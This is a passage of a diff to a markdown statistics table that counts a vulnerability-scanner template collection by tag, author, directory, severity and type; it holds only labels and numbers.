| | -| ftp | 8 | jarijaas | 3 | | | | | | | -| aws | 8 | z3bd | 3 | | | | | | | -| router | 8 | fyoorer | 3 | | | | | | | -| cnvd | 8 | impramodsargar | 3 | | | | | | | -| rails | 8 | binaryfigments | 3 | | | | | | | -| airflow | 8 | thomas_from_offensity | 3 | | | | | | | -| gitlab | 8 | mavericknerd | 3 | | | | | | | -| nginx | 7 | yash anand @yashanand155 | 3 | | | | | | | -| joomla | 7 | kiblyn11 | 2 | | | | | | | -| xxe | 7 | dheerajmadhukar | 2 | | | | | | | -| vmware | 7 | random-robbie | 2 | | | | | | | -| scada | 7 | foulenzer | 2 | | | | | | | -| backup | 6 | afaq | 2 | | | | | | | -| cms | 6 | moritz nentwig | 2 | | | | | | | -| api | 6 | amsda | 2 | | | | | | | -| google | 6 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| coldfusion | 6 | ehsahil | 2 | | | | | | | -| rconfig | 6 | randomrobbie | 2 | | | | | | | -| citrix | 6 | incogbyte | 2 | | | | | | | -| jetty | 6 | lu4nx | 2 | | | | | | | -| java | 5 | zomsop82 | 2 | | | | | | | -| circarlife | 5 | w4cky_ | 2 | | | | | | | -| laravel | 5 | 0xsapra | 2 | | | | | | | -| lucee | 5 | ree4pwn | 2 | | | | | | | -| dell | 5 | vavkamil | 2 | | | | | | | -| dedecms | 5 | 0xrudra | 2 | | | | | | | -| headless | 5 | emenalf | 2 | | | | | | | -| django | 5 | shifacyclewala | 2 | | | | | | | -| login | 5 | davidmckennirey | 2 | | | | | | | -| ibm | 5 | lotusdll | 2 | | | | | | | -| phpmyadmin | 5 | x1m_martijn | 2 | | | | | | | -| iis | 5 | unstabl3 | 2 | | | | | | | -| cve2009 | 5 | manas_harsh | 2 | | | | | | | -| files | 5 | bp0lr | 2 | | | | | | | -| ruijie | 5 | joeldeleep | 2 | | | | | | | -| confluence | 5 | 0xcrypto | 2 | | | | | | | -| solr | 5 | udit_thakkur | 2 | | | | | | | -| ssti | 5 | 0xelkomy | 2 | | | | | | | -| drupal | 5 | pxmme1337 | 2 | | | | | | | -| netgear | 5 | bing0o | 2 | | | | | | | -| moodle | 4 | fabaff | 2 | | | | | | | -| jolokia | 4 | gevakun | 2 | | | | | | | -| hongdian | 4 | 0xprial | 2 | | | | | | | -| tomcat | 4 | nkxxkn | 2 | | | | | | | -| solarwinds | 4 | swissky | 2 | | | | | | | -| thinkphp | 4 | hetroublemakr | 2 | | | | | | | -| magmi | 4 | koti2 | 2 | | | | | | | -| crlf | 4 | bsysop | 2 | | | | | | | -| traversal | 4 | noamrathaus | 1 | | | | | | | -| vpn | 4 | manuelbua | 1 | | | | | | | -| webserver | 4 | 52971 | 1 | | | | | | | -| fileupload | 4 | 0h1in9e | 1 | | | | | | | -| docker | 4 | abison_binoy | 1 | | | | | | | -| nodejs | 4 | sullo | 1 | | | | | | | -| artifactory | 4 | kareemse1im | 1 | | | | | | | -| asp | 4 | hakluke | 1 | | | | | | | -| samsung | 4 | vzamanillo | 1 | | | | | | | -| elastic | 4 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| thinkcmf | 4 | yavolo | 1 | | | | | | | -| resin | 3 | aaron_costello | 1 | | | | | | | -| | | (@conspiracyproof) | | | | | | | | -| terramaster | 3 | andirrahmani1 | 1 | | | | | | | -| hp | 3 | omarkurt | 1 | | | | | | | -| nosqli | 3 | idealphase | 1 | | | | | | | -| fpd | 3 | zandros0 | 1 | | | | | | | -| deserialization | 3 | johnk3r | 1 | | | | | | | -| kafka | 3 | shreyapohekar | 1 | | | | | | | -| springcloud | 3 | mah3sec_ | 1 | | | | | | | -| microstrategy | 3 | bad5ect0r | 1 | | | | | | | -| vbulletin | 3 | naglinagli | 1 | | | | | | | -| grafana | 3 | un-fmunozs | 1 | | | | | | | -| amazon | 3 | mhdsamx | 1 | | | | | | | -| ebs | 3 | elmahdi | 1 | | | | | | | -| slack | 3 | ahmed sherif | 1 | | | | | | | -| kubernetes | 3 | gal nagli | 1 | | | | | | | -| cve2010 | 3 | undefl0w | 1 | | | | | | | -| ofbiz | 3 | regala_ | 1 | | | | | | | -| caucho | 3 | rtcms | 1 | | | | | | | -| bypass | 3 | ratnadip gajbhiye | 1 | | | | | | | -| printer | 3 | soyelmago | 1 | | | | | | | -| targa | 3 | bjhulst | 1 | | | | | | | -| log | 3 | luskabol | 1 | | | | | | | -| mongodb | 3 | bernardofsr | 1 | | | | | | | -| fanruan | 3 | andysvints | 1 | | | | | | | -| backups | 3 | kurohost | 1 | | | | | | | -| ssh | 3 | revblock | 1 | | | | | | | -| windows | 3 | alperenkesk | 1 | | | | | | | -| nacos | 3 | sicksec | 1 | | | | | | | -| lfr | 3 | thevillagehacker | 1 | | | | | | | -| git | 3 | its0x08 | 1 | | | | | | | -| r-seenet | 3 | r3naissance | 1 | | | | | | | -| openssh | 3 | bernardo rodrigues | 1 | | | | | | | -| | | @bernardofsr | andré monteiro | | | | | | | | -| | | @am0nt31r0 | | | | | | | | -| oa | 3 | s1r1u5_ | 1 | | | | | | | -| kibana | 2 | akshansh | 1 | | | | | | | -| cve2008 | 2 | sid ahmed malaoui @ realistic | 1 | | | | | | | -| | | security | | | | | | | | -| smtp | 2 | furkansenan | 1 | | | | | | | -| waf | 2 | kabirsuda | 1 | | | | | | | -| injection | 2 | 0xrod | 1 | | | | | | | -| zabbix | 2 | _darrenmartyn | 1 | | | | | | | -| kevinlab | 2 | shelld3v | 1 | | | | | | | -| nagios | 2 | ipanda | 1 | | | | | | | -| telerik | 2 | chron0x | 1 | | | | | | | -| proxy | 2 | alifathi-h1 | 1 | | | | | | | -| openam | 2 | dawid czarnecki | 1 | | | | | | | -| spark | 2 | pdp | 1 | | | | | | | -| keycloak | 2 | 0xtavian | 1 | | | | | | | -| kentico | 2 | affix | 1 | | | | | | | -| leak | 2 | taielab | 1 | | | | | | | -| voipmonitor | 2 | th3.d1p4k | 1 | | | | | | | -| pega | 2 | shifacyclewla | 1 | | | | | | | -| nextjs | 2 | luci | 1 | | | | | | | -| dos | 2 | mubassirpatel | 1 | | | | | | | -| jellyfin | 2 | patralos | 1 | | | | | | | -| nexus | 2 | c3l3si4n | 1 | | | | | | | -| sonicwall | 2 | ooooooo_q | 1 | | | | | | | -| strapi | 2 | rojanrijal | 1 | | | | | | | -| zhiyuan | 2 | defr0ggy | 1 | | | | | | | -| httpd | 2 | toufik airane | 1 | | | | | | | -| paloalto | 2 | flag007 | 1 | | | | | | | -| globalprotect | 2 | arcc | 1 | | | | | | | -| rockethchat | 2 | geraldino2 | 1 | | | | | | | -| saltstack | 2 | apt-mirror | 1 | | | | | | | -| odoo | 2 | sickwell | 1 | | | | | | | -| chamilo | 2 | j33n1k4 | 1 | | | | | | | -| bigip | 2 | willd96 | 1 | | | | | | | -| openfire | 2 | ohlinge | 1 | | | | | | | -| trixbox | 2 | hanlaomo | 1 | | | | | | | -| microsoft | 2 | knassar702 | 1 | | | | | | | -| ucmdb | 2 | g4l1t0 and @convisoappsec | 1 | | | | | | | -| shellshock | 2 | tim_koopmans | 1 | | | | | | | -| xxljob | 2 | fopina | 1 | | | | | | | -| hpe | 2 | schniggie | 1 | | | | | | | -| cve2007 | 2 | b0yd | 1 | | | | | | | -| oauth | 2 | 0xteles | 1 | | | | | | | -| rockmongo | 2 | smaranchand | 1 | | | | | | | -| prometheus | 2 | deena | 1 | | | | | | | -| intrusive | 2 | yashanand155 | 1 | | | | | | | -| glassfish | 2 | streetofhackerr007 (rohit | 1 | | | | | | | -| | | soni) | | | | | | | | -| sonarqube | 2 | retr0 | 1 | | | | | | | -| frp | 2 | ilovebinbash | 1 | | | | | | | -| chiyu | 2 | kba@sogeti_esec | 1 | | | | | | | -| hjtcloud | 2 | kishore krishna (sillydaddy) | 1 | | | | | | | -| cache | 2 | exploitation | 1 | | | | | | | -| emerge | 2 | notsoevilweasel | 1 | | | | | | | -| icewarp | 2 | co0nan | 1 | | | | | | | -| rstudio | 2 | gboddin | 1 | | | | | | | -| hashicorp | 2 | @github.com/defr0ggy | 1 | | | | | | | -| yapi | 2 | pudsec | 1 | | | | | | | -| mida | 2 | aceseven (digisec360) | 1 | | | | | | | -| seeyon | 2 | streetofhackerr007 | 1 | | | | | | | -| sharepoint | 2 | alex | 1 | | | | | | | -| plesk | 2 | yashgoti | 1 | | | | | | | -| igs | 2 | akash.c | 1 | | | | | | | -| linkerd | 2 | alph4byt3 | 1 | | | | | | | -| couchdb | 2 | berkdusunur | 1 | | | | | | | -| idrac | 2 | rodnt | 1 | | | | | | | -| activemq | 2 | _harleo | 1 | | | | | | | -| fortios | 2 | sy3omda | 1 | | | | | | | -| splunk | 2 | sshell | 1 | | | | | | | -| webcam | 2 | remonsec | 1 | | | | | | | -| service | 2 | zhenwarx | 1 | | | | | | | -| maian | 2 | ldionmarcil | 1 | | | | | | | -| flir | 2 | micha3lb3n | 1 | | | | | | | -| mail | 2 | sushant kamble | 1 | | | | | | | -| | | (https://in.linkedin.com/in/sushantkamble) | | | | | | | | -| ecology | 2 | thezakman | 1 | | | | | | | -| jboss | 2 | mohammedsaneem | 1 | | | | | | | -| showdoc | 2 | jteles | 1 | | | | | | | -| smb | 2 | petruknisme | 1 | | | | | | | -| huawei | 2 | makyotox | 1 | | | | | | | -| wordfence | 2 | absshax | 1 | | | | | | | -| bitrix | 2 | cookiehanhoan | 1 | | | | | | | -| vrealize | 2 | divya_mudgal | 1 | | | | | | | -| natshell | 2 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| zenario | 1 | dogasantos | 1 | | | | | | | -| enum | 1 | b4uh0lz | 1 | | | | | | | -| csod | 1 | tirtha_mandal | 1 | | | | | | | -| rfi | 1 | jeya seelan | 1 | | | | | | | -| seacms | 1 | wabafet | 1 | | | | | | | -| spf | 1 | @dwisiswant0 | 1 | | | | | | | -| sco | 1 | iampritam | 1 | | | | | | | -| expose | 1 | vsh00t | 1 | | | | | | | -| azure | 1 | bolli95 | 1 | | | | | | | -| chevereto | 1 | raesene | 1 | | | | | | | -| firebase | 1 | fmunozs | 1 | | | | | | | -| sprintful | 1 | d0rkerdevil | 1 | | | | | | | -| javafaces | 1 | becivells | 1 | | | | | | | -| fortigates | 1 | johnjhacking | 1 | | | | | | | -| clusterengine | 1 | 0ut0fb4nd | 1 | | | | | | | -| proftpd | 1 | ajaysenr | 1 | | | | | | | -| iptime | 1 | juicypotato1 | 1 | | | | | | | -| goahead | 1 | qlkwej | 1 | | | | | | | -| ssltls | 1 | daviey | 1 | | | | | | | -| zend | 1 | whynotke | 1 | | | | | | | -| javamelody | 1 | j3ssie/geraldino2 | 1 | | | | | | | -| visualtools | 1 | aresx | 1 | | | | | | | -| nedi | 1 | blckraven | 1 | | | | | | | -| eprints | 1 | nytr0gen | 1 | | | | | | | -| zarafa | 1 | _c0wb0y_ | 1 | | | | | | | -| avtech | 1 | ringo | 1 | | | | | | | -| kong | 1 | | | | | | | | | -| anchorcms | 1 | | | | | | | | | -| xunchi | 1 | | | | | | | | | -| phpinfo | 1 | | | | | | | | | -| stem | 1 | | | | | | | | | -| wavlink | 1 | | | | | | | | | -| mysql | 1 | | | | | | | | | -| idemia | 1 | | | | | | | | | -| webui | 1 | | | | | | | | | -| beanshell | 1 | | | | | | | | | -| servicedesk | 1 | | | | | | | | | -| codemeter | 1 | | | | | | | | | -| mantisbt | 1 | | | | | | | | | -| crm | 1 | | | | | | | | | -| panos | 1 | | | | | | | | | -| manageengine | 1 | | | | | | | | | -| wildfly | 1 | | | | | | | | | -| ssl | 1 | | | | | | | | | -| h3c-imc | 1 | | | | | | | | | -| zimbra | 1 | | | | | | | | | -| dvr | 1 | | | | | | | | | -| postgres | 1 | | | | | | | | | -| servicenow | 1 | | | | | | | | | -| subrion | 1 | | | | | | | | | -| magicflow | 1 | | | | | | | | | -| lighttpd | 1 | | | | | | | | | -| npm | 1 | | | | | | | | | -| openrestry | 1 | | | | | | | | | -| yii | 1 | | | | | | | | | -| appweb | 1 | | | | | | | | | -| redwood | 1 | | | | | | | | | -| krweb | 1 | | | | | | | | | -| pagespeed | 1 | | | | | | | | | -| ecom | 1 | | | | | | | | | -| trilithic | 1 | | | | | | | | | -| lancom | 1 | | | | | | | | | -| majordomo2 | 1 | | | | | | | | | -| kyan | 1 | | | | | | | | | -| szhe | 1 | | | | | | | | | -| dompdf | 1 | | | | | | | | | -| interlib | 1 | | | | | | | | | -| htmli | 1 | | | | | | | | | -| exacqvision | 1 | | | | | | | | | -| liferay | 1 | | | | | | | | | -| pacsone | 1 | | | | | | | | | -| mailchimp | 1 | | | | | | | | | -| opm | 1 | | | | | | | | | -| nomad | 1 | | | | | | | | | -| emc | 1 | | | | | | | | | -| clave | 1 | | | | | | | | | -| discourse | 1 | | | | | | | | | -| sidekiq | 1 | | | | | | | | | -| xmlchart | 1 | | | | | | | | | -| dotclear | 1 | | | | | | | | | -| ioncube | 1 | | | | | | | | | -| 74cms | 1 | | | | | | | | | -| mirai | 1 | | | | | | | | | -| socomec | 1 | | | | | | | | | -| tika | 1 | | | | | | | | | -| rmi | 1 | | | | | | | | | -| redis | 1 | | | | | | | | | -| plugin | 1 | | | | | | | | | -| dotnet | 1 | | | | | | | | | -| javascript | 1 | | | | | | | | | -| bitly | 1 | | | | | | | | | -| sqlite | 1 | | | | | | | | | -| jmx | 1 | | | | | | | | | -| alerta | 1 | | | | | | | | | -| linksys | 1 | | | | | | | | | -| cloudinary | 1 | | | | | | | | | -| springframework | 1 | | | | | | | | | -| nordex | 1 | | | | | | | | | -| flink | 1 | | | | | | | | | -| tapestry | 1 | | | | | | | | | -| db | 1 | | | | | | | | | -| setup | 1 | | | | | | | | | -| portainer | 1 | | | | | | | | | -| finereport | 1 | | | | | | | | | -| aspnuke | 1 | | | | | | | | | -| saltapi | 1 | | | | | | | | | -| comodo | 1 | | | | | | | | | -| ricoh | 1 | | | | | | | | | -| ilo4 | 1 | | | | | | | | | -| redhat | 1 | | | | | | | | | -| wazuh | 1 | | | | | | | | | -| drone | 1 | | | | | | | | | -| zookeeper | 1 | | | | | | | | | -| status | 1 | | | | | | | | | -| fiori | 1 | | | | | | | | | -| jsf | 1 | | | | | | | | | -| cve2005 | 1 | | | | | | | | | -| sitecore | 1 | | | | | | | | | -| payara | 1 | | | | | | | | | -| wavemaker | 1 | | | | | | | | | -| yachtcontrol | 1 | | | | | | | | | -| wso2 | 1 | | | | | | | | | -| klog | 1 | | | | | | | | | -| moinmoin | 1 | | | | | | | | | -| geddy | 1 | | | | | | | | | -| gogs | 1 | | | | | | | | | -| tensorboard | 1 | | | | | | | | | -| bullwark | 1 | | | | | | | | | -| k8 | 1 | | | | | | | | | -| wamp | 1 | | | | | | | | | -| tensorflow | 1 | | | | | | | | | -| itop | 1 | | | | | | | | | -| enumeration | 1 | | | | | | | | | -| fortinet | 1 | | | | | | | | | -| linkedin | 1 | | | | | | | | | -| vsphere | 1 | | | | | | | | | -| rdp | 1 | | | | | | | | | -| ambari | 1 | | | | | | | | | -| varnish | 1 | | | | | | | | | -| druid | 1 | | | | | | | | | -| jquery | 1 | | | | | | | | | -| cgi | 1 | | | | | | | | | -| fastapi | 1 | | | | | | | | | -| solman | 1 | | | | | | | | | -| maccmsv10 | 1 | | | | | | | | | -| wifisky | 1 | | | | | | | | | -| tpshop | 1 | | | | | | | | | -| clockwatch | 1 | | | | | | | | | -| cocoon | 1 | | | | | | | | | -| centos | 1 | | | | | | | | | -| akamai | 1 | | | | | | | | | -| pippoint | 1 | | | | | | | | | -| zmanda | 1 | | | | | | | | | -| heroku | 1 | | | | | | | | | -| rhymix | 1 | | | | | | | | | -| circontrol | 1 | | | | | | | | | -| zzzcms | 1 | | | | | | | | | -| bedita | 1 | | | | | | | | | -| discord | 1 | | | | | | | | | -| checkpoint | 1 | | | | | | | | | -| calendarix | 1 | | | | | | | | | -| scimono | 1 | | | | | | | | | -| erp-nc | 1 | | | | | | | | | -| powercreator | 1 | | | | | | | | | -| webmin | 1 | | | | | | | | | -| grav | 1 | | | | | | | | | -| 2014 | 1 | | | | | | | | | -| zm | 1 | | | | | | | | | -| svn | 1 | | | | | | | | | -| triconsole | 1 | | | | | | | | | -| xiuno | 1 | | | | | | | | | -| weiphp | 1 | | | | | | | | | -| dvwa | 1 | | | | | | | | | -| addpac | 1 | | | | | | | | | -| webadmin | 1 | | | | | | | | | -| mdb | 1 | | | | | | | | | -| email | 1 | | | | | | | | | -| alibaba | 1 | | | | | | | | | -| starttls | 1 | | | | | | | | | -| haproxy | 1 | | | | | | | | | -| octoprint | 1 | | | | | | | | | -| uwsgi | 1 | | | | | | | | | -| vnc | 1 | | | | | | | | | -| huijietong | 1 | | | | | | | | | -| feifeicms | 1 | | | | | | | | | -| glpi | 1 | | | | | | | | | -| hadoop | 1 | | | | | | | | | -| scs | 1 | | | | | | | | | -| duomicms | 1 | | | | | | | | | -| plastic | 1 | | | | | | | | | -| viewlinc | 1 | | | | | | | | | -| akkadian | 1 | | | | | | | | | -| dlogin | 1 | | | | | | | | | -| symfony | 1 | | | | | | | | | -| blackboard | 1 | | | | | | | | | -| zte | 1 | | | | | | | | | -| dotnetnuke | 1 | | | | | | | | | -| ruby | 1 | | | | | | | | | -| adminer | 1 | | | | | | | | | -| upload | 1 | | | | | | | | | -| kubeflow | 1 | | | | | | | | | -| keenetic | 1 | | | | | | | | | -| expn | 1 | | | | | | | | | -| hasura | 1 | | | | | | | | | -| zcms | 1 | | | | | | | | | -| fuelcms | 1 | | | | | | | | | -| sentry | 1 | | | | | | | | | -| opensmtpd | 1 | | | | | | | | | -| mariadb | 1 | | | | | | | | | -| doh | 1 | | | | | | | | | -| geutebruck | 1 | | | | | | | | | -| mediumish | 1 | | | | | | | | | -| apos | 1 | | | | | | | | | -| etouch | 1 | | | | | | | | | -| jitsi | 1 | | | | | | | | | -| diris | 1 | | | | | | | | | -| hortonworks | 1 | | | | | | | | | -| xff | 1 | | | | | | | | | -| k8s | 1 | | | | | | | | | -| livezilla | 1 | | | | | | | | | -| default-login | 1 | | | | | | | | | -| acexy | 1 | | | | | | | | | -| ruckus | 1 | | | | | | | | | -| emby | 1 | | | | | | | | | -| glances | 1 | | | | | | | | | -| rujjie | 1 | | | | | | | | | -| ueditor | 1 | | | | | | | | | -| monitorix | 1 | | | | | | | | | -| pulsesecure | 1 | | | | | | | | | -| skywalking | 1 | | | | | | | | | -| plc | 1 | | | | | | | | | -| fedora | 1 | | | | | | | | | -| jsp | 1 | | | | | | | | | -| postmessage | 1 | | | | | | | | | -| labtech | 1 | | | | | | | | | -| lotuscms | 1 | | | | | | | | | -| netis | 1 | | | | | | | | | -| node | 1 | | | | | | | | | -| shopware | 1 | | | | | | | | | -| spring | 1 | | | | | | | | | -| openerp | 1 | | | | | | | | | -| moin | 1 | | | | | | | | | -| salesforce | 1 | | | | | | | | | -| ns | 1 | | | | | | | | | -| sangfor | 1 | | | | | | | | | -| dom | 1 | | | | | | | | | -| netsweeper | 1 | | | | | | | | | -| razor | 1 | | | | | | | | | -| gitlist | 1 | | | | | | | | | -| mongoshake | 1 | | | | | | | | | -| jfrog | 1 | | | | | | | | | -| optiLink | 1 | | | | | | | | | -| wuzhicms | 1 | | | | | | | | | -| myucms | 1 | | | | | | | | | -| favicon | 1 | | | | | | | | | -| fortilogger | 1 | | | | | | | | | -| mautic | 1 | | | | | | | | | -| redcap | 1 | | | | | | | | | -| zeroshell | 1 | | | | | | | | | -| wp-theme | 1 | | | | | | | | | -| tileserver | 1 | | | | | | | | | -| opencast | 1 | | | | | | | | | -| aura | 1 | | | | | | | | | -| mantis | 1 | | | | | | | | | -| landray | 1 | | | | | | | | | -| flash | 1 | | | | | | | | | -| jenzabar | 1 | | | | | | | | | -| swagger | 1 | | | | | | | | | -| ulterius | 1 | | | | | | | | | -| robomongo | 1 | | | | | | | | | -| expressjs | 1 | | | | | | | | | -| bookstack | 1 | | | | | | | | | -| metinfo | 1 | | | | | | | | | -| oscommerce | 1 | | | | | | | | | -| ems | 1 | | | | | | | | | -| mongo | 1 | | | | | | | | | -| b2evolution | 1 | | | | | | | | | -| wiki | 1 | | | | | | | | | -| ntopng | 1 | | | | | | | | | -| blind | 1 | | | | | | | | | -| soar | 1 | | | | | | | | | -| mcafee | 1 | | | | | | | | | -| opensns | 1 | | | | | | | | | -| ganglia | 1 | | | | | | | | | -| shopxo | 1 | | | | | | | | | -| tongda | 1 | | | | | | | | | -| mara | 1 | | | | | | | | | -| phpfusion | 1 | | | | | | | | | -| lansweeper | 1 | | | | | | | | | -| thinkadmin | 1 | | | | | | | | | -| floc | 1 | | | | | | | | | -| faraday | 1 | | | | | | | | | -| jenkin | 1 | | | | | | | | | -| mobileiron | 1 | | | | | | | | | -| rsyncd | 1 | | | | | | | | | -| visionhub | 1 | | | | | | | | | -| bolt | 1 | | | | | | | | | -| kerbynet | 1 | | | | | | | | | -| nsasg | 1 | | | | | | | | | -| eyou | 1 | | | | | | | | | -| xml | 1 | | | | | | | | | -| wooyun | 1 | | | | | | | | | -| rmc | 1 | | | | | | | | | -| monitorr | 1 | | | | | | | | | -| backdoor | 1 | | | | | | | | | -| cacti | 1 | | | | | | | | | -| st | 1 | | | | | | | | | -| smartsense | 1 | | | | | | | | | -| esmtp | 1 | | | | | | | | | -| tenda | 1 | | | | | | | | | -| kafdrop | 1 | | | | | | | | | -| acme | 1 | | | | | | | | | -| opentsdb | 1 | | | | | | | | | -| spectracom | 1 | | | | | | | | | -| exchange | 1 | | | | | | | | | -| commscope | 1 | | | | | | | | | -| xdcms | 1 | | | | | | | | | -| horde | 1 | | | | | | | | | -| synnefo | 1 | | | | | | | | | -| accela | 1 | | | | | | | | | -| selea | 1 | | | | | | | | | -| apiman | 1 | | | | | | | | | -| blue-ocean | 1 | | | | | | | | | -| gridx | 1 | | | | | | | | | -| csrf | 1 | | | | | | | | | -| traefik | 1 | | | | | | | | | -| codeigniter | 1 | | | | | | | | | -| realteo | 1 | | | | | | | | | -| timesheet | 1 | | | | | | | | | -| empirecms | 1 | | | | | | | | | -| cors | 1 | | | | | | | | | -| jnoj | 1 | | | | | | | | | -| lanproxy | 1 | | | | | | | | | -| octobercms | 1 | | | | | | | | | -| nps | 1 | | | | | | | | | -| webftp | 1 | | | | | | | | | -| fastcgi | 1 | | | | | | | | | -| netdata | 1 | | | | | | | | | -| nc2 | 1 | | | | | | | | | -| openstack | 1 | | | | | | | | | -| hiboss | 1 | | | | | | | | | -| concrete | 1 | | | | | | | | | -| webmodule-ee | 1 | | | | | | | | | -| totaljs | 1 | | | | | | | | | -| avalanche | 1 | | | | | | | | | -| fortigate | 1 | | | | | | | | | -| lutron | 1 | | | | | | | | | -| turbocrm | 1 | | | | | | | | | -| cobub | 1 | | | | | | | | | -| svnserve | 1 | | | | | | | | | -| panabit | 1 | | | | | | | | | -| cloudflare | 1 | | | | | | | | | -| domxss | 1 | | | | | | | | | -| woocomernce | 1 | | | | | | | | | -| bruteforce | 1 | | | | | | | | | -| mpsec | 1 | | | | | | | | | -| plone | 1 | | | | | | | | | -| pgadmin | 1 | | | | | | | | | -| phpunit | 1 | | | | | | | | | -| vscode | 1 | | | | | | | | | -| timeclock | 1 | | | | | | | | | -| spidercontrol | 1 | | | | | | | | | -| gateone | 1 | | | | | | | | | -| fortiweb | 1 | | | | | | | | | -| ec2 | 1 | | | | | | | | | -| sarg | 1 | | | | | | | | | -| axis | 1 | | | | | | | | | -| upnp | 1 | | | | | | | | | -| vsftpd | 1 | | | | | | | | | -| rabbitmq | 1 | | | | | | | | | -| nuuo | 1 | | | | | | | | | -| rubedo | 1 | | | | | | | | | -| nuxeo | 1 | | | | | | | | | -| sceditor | 1 | | | | | | | | | -| darkstat | 1 | | | | | | | | | -| biometrics | 1 | | | | | | | | | -| arl | 1 | | | | | | | | | -| cse | 1 | | | | | | | | | -| tamronos | 1 | | | | | | | | | -| jeewms | 1 | | | | | | | | | -| node-red-dashboard | 1 | | | | | | | | | -| memcached | 1 | | | | | | | | | -| alertmanager | 1 | | | | | | | | | -| primetek | 1 | | | | | | | | | -| bash | 1 | | | | | | | | | -| chinaunicom | 1 | | | | | | | | | -| phalcon | 1 | | | | | | | | | -| circontrorl | 1 | | | | | | | | | -| grails | 1 | | | | | | | | | -| nexusdb | 1 | | | | | | | | | -| nette | 1 | | | | | | | | | -| pyramid | 1 | | | | | | | | | -| gloo | 1 | | | | | | | | | -| parentlink | 1 | | | | | | | | | -| viewpoint | 1 | | | | | | | | | -| harbor | 1 | | | | | | | | | -| wmt | 1 | | | | | | | | | -| episerver | 1 | | | | | | | | | -| landrayoa | 1 | | | | | | | | | -| netrc | 1 | | | | | | | | | -| extractor | 1 | | | | | | | | | -| embedthis | 1 | | | | | | | | | - +| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | +|--------------------|-------|--------------------------------------------|-------|-------------------------|-------|----------|-------|---------|-------| +| cve | 511 | dhiyaneshdk | 220 | cves | 518 | info | 535 | http | 1566 | +| panel | 202 | pikpikcu | 195 | vulnerabilities | 246 | high | 426 | file | 42 | +| xss | 182 | pdteam | 187 | exposed-panels | 204 | medium | 349 | network | 35 | +| wordpress | 180 | dwisiswant0 | 126 | exposures | 168 | critical | 201 | dns | 10 | +| exposure | 176 | geeknik | 119 | technologies | 136 | low | 147 | | | +| rce | 173 | daffainfo | 99 | misconfiguration | 115 | | | | | +| cve2020 | 145 | madrobot | 60 | takeovers | 70 | | | | | +| lfi | 143 | princechaddha | 52 | default-logins | 49 | | | | | +| wp-plugin | 120 | gy741 | 48 | file | 42 | | | | | +| config | 90 | gaurang | 42 | workflows | 34 | | | | | +| cve2021 | 83 | pussycat0x | 34 | miscellaneous | 27 | | | | | +| cve2019 | 82 | ice3man | 26 | network | 27 | | | | | +| tech | 78 | organiccrap | 24 | iot | 22 | | | | | +| takeover | 72 | 0x_akoko | 20 | fuzzing | 10 | | | | | +| cve2018 | 66 | sheikhrishad | 15 | dns | 10 | | | | | +| | 66 | milo2012 | 14 | cnvd | 9 | | | | | +| token | 63 | philippedelteil | 14 | headless | 5 | | | | | +| apache | 61 | pr3r00t | 13 | .pre-commit-config.yaml | 1 | | | | | +| default-login | 50 | techbrunchfr | 13 | | | | | | | +| iot | 43 | suman_kar | 12 | | | | | | | +| cve2017 | 43 | cyllective | 11 | | | | | | | +| file | 42 | random_robbie | 10 | | | | | | | +| unauth | 40 | righettod | 9 | | | | | | | +| network | 35 | wdahlenb | 9 | | | | | | | +| sqli | 34 | hackergautam | 8 | | | | | | | +| oob | 32 | nadino | 8 | | | | | | | +| logs | 29 | aashiq | 8 | | | | | | | +| oracle | 29 | iamthefrogy | 8 | | | | | | | +| workflow | 29 | melbadry9 | 8 | | | | | | | +| ssrf | 27 | that_juan_ | 8 | | | | | | | +| misc | 27 | randomstr1ng | 7 | | | | | | | +| jira | 26 | dr_set | 7 | | | | | | | +| atlassian | 26 | emadshanab | 7 | | | | | | | +| disclosure | 25 | 0x240x23elu | 7 | | | | | | | +| cve2016 | 23 | oppsec | 7 | | | | | | | +| listing | 22 | harshbothra_ | 7 | | | | | | | +| redirect | 20 | techryptic (@tech) | 7 | | | | | | | +| aem | 19 | kophjager007 | 7 | | | | | | | +| cisco | 17 | r3dg33k | 7 | | | | | | | +| sap | 16 | puzzlepeaches | 6 | | | | | | | +| debug | 14 | caspergn | 6 | | | | | | | +| misconfig | 13 | __fazal | 6 | | | | | | | +| struts | 13 | yanyun | 5 | | | | | | | +| fuzz | 13 | joanbono | 5 | | | | | | | +| cve2015 | 13 | panch0r3d | 5 | | | | | | | +| adobe | 12 | ganofins | 5 | | | | | | | +| auth-bypass | 12 | pentest_swissky | 5 | | | | | | | +| weblogic | 12 | meme-lord | 4 | | | | | | | +| android | 12 | iamnoooob | 4 | | | | | | | +| dns | 11 | xelkomy | 4 | | | | | | | +| cve2012 | 11 | nodauf | 4 | | | | | | | +| zoho | 11 | elsfa7110 | 4 | | | | | | | +| springboot | 11 | github.com/its0x08 | 4 | | | | | | | +| cve2011 | 11 | rootxharsh | 4 | | | | | | | +| cve2014 | 10 | e_schultze_ | 4 | | | | | | | +| devops | 10 | impramodsargar | 3 | | | | | | | +| jenkins | 10 | z3bd | 3 | | | | | | | +| cve2013 | 10 | mavericknerd | 3 | | | | | | | +| php | 10 | binaryfigments | 3 | | | | | | | +| dlink | 10 | tess | 3 | | | | | | | +| magento | 9 | dudez | 3 | | | | | | | +| gitlab | 8 | shine | 3 | | | | | | | +| ftp | 8 | yash anand @yashanand155 | 3 | | | | | | | +| rails | 8 | fyoorer | 3 | | | | | | | +| aws | 8 | f1tz | 3 | | | | | | | +| airflow | 8 | thomas_from_offensity | 3 | | | | | | | +| cnvd | 8 | _generic_human_ | 3 | | | | | | | +| router | 8 | jarijaas | 3 | | | | | | | +| joomla | 7 | 0w4ys | 3 | | | | | | | +| nginx | 7 | ree4pwn | 2 | | | | | | | +| scada | 7 | joeldeleep | 2 | | | | | | | +| xxe | 7 | 0xsapra | 2 | | | | | | | +| vmware | 7 | incogbyte | 2 | | | | | | | +| coldfusion | 6 | x1m_martijn | 2 | | | | | | | +| jetty | 6 | vavkamil | 2 | | | | | | | +| rconfig | 6 | dheerajmadhukar | 2 | | | | | | | +| google | 6 | amsda | 2 | | | | | | | +| backup | 6 | fabaff | 2 | | | | | | | +| citrix | 6 | 0xrudra | 2 | | | | | | | +| api | 6 | 0xcrypto | 2 | | | | | | | +| cms | 6 | hetroublemakr | 2 | | | | | | | +| lucee | 5 | koti2 | 2 | | | | | | | +| java | 5 | 0xelkomy | 2 | | | | | | | +| dedecms | 5 | davidmckennirey | 2 | | | | | | | +| ruijie | 5 | 